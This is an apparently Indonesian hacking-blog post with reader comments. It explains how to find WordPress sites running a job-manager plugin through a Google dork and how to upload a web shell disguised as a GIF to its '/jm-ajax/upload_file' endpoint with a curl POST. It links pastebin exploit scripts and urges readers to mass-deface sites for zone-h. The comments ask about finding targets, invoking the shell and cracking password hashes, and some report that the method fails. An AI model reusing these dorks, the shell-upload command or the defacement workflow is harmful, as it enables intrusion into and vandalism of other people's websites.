Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file
Example:
www.target.com/jm-ajax/upload_file/
 |
| ( Vuln Target ) |
Exploit:
1. CSRF
2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"
Upload file anda dengan format .gif/.jpg/.png
Script:
- https://pastebin.com/hp0jJr1g [PHP][CLI Based]
- https://pastebin.com/FaACEDLg [BASH]
Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.
21 comments:
nyari targetnya gimana bang ???
inurl:/wp-content/uploads/job-manager-uploads
ada tutor deface buat yg blm ngerti apa2 gak om?
cek archive aja, di cari"
bro what tool name used in windows to run php files
xampp bro
see tuts: http://www.indoxploit.or.id/2016/07/cara-menjalankan-exploiter-php.html
bro,kalo password hash nya pula gmana mau dapatkan?
{"success":false,"data":[{"code":"upload","message":"You must be logged in to upload files using this method."}]}
tOLONG diperjelas lagi step by step urutan yang harus dilakukan. terimakasih.
Saya upload file pakai script php yang ada di bagian step pertma di tutorial ini dan sudah berhasil sampai step muncul {"files":[]}, kemudian langkah apalagi yang harus saya lakukan.
Terimakash
ke google terus ketik inurl:/wp-content/uploads/job-manager-uploads
Mas mau nanya, ini bisa di exploit sampe upload shell ga sih ? maaf saya masih newbie banget makanya kurang tau banyak, makasih
thanks selalu om agus,,, maap baru jalan2 di mari lagi :D
ga vuln itu gan
pake toolsnya aja gan, cuma tinggal masukin url doang sama ganti gambarnya
gabisa gan cuma sekedar upload gambar aja
jangan bosen bosen gan
Cara manngil shell nya gmna bang?
pake ini https://www.indoxploit.or.id/2017/03/wordpress-hash-decrypter-tools.html
gabisa upload shell
Post a Comment